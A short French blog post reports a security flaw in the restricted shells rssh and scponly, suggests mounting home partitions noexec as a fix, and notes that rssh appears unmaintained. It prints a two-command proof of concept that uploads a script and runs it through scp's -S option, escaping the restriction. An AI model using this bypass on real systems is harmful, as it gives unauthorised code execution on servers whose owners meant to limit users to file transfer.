Il y a quelques temps de cela, je vous parlais de rssh. Un problème de sécurité vient d'être levé, que ce soit pour rssh ou scponly, il y a moyen de faire exécuter tout simplement un script :
scp command.sh restricteduser@remotehost:/tmp/command.sh
ssh restricteduser@remotehost 'scp -S /tmp/command.sh localhost:/dev/null /tmp'
Un noexec sur les partitions d'accueil semble être un peu brutal, mais une bonne solution :)
Un peu plus inquiétant : le mainteneur de rssh ne semble plus vouloir maintenir quoi que ce soit. Ça craint fortement, pour une fois qu'une solution semblait intéressante.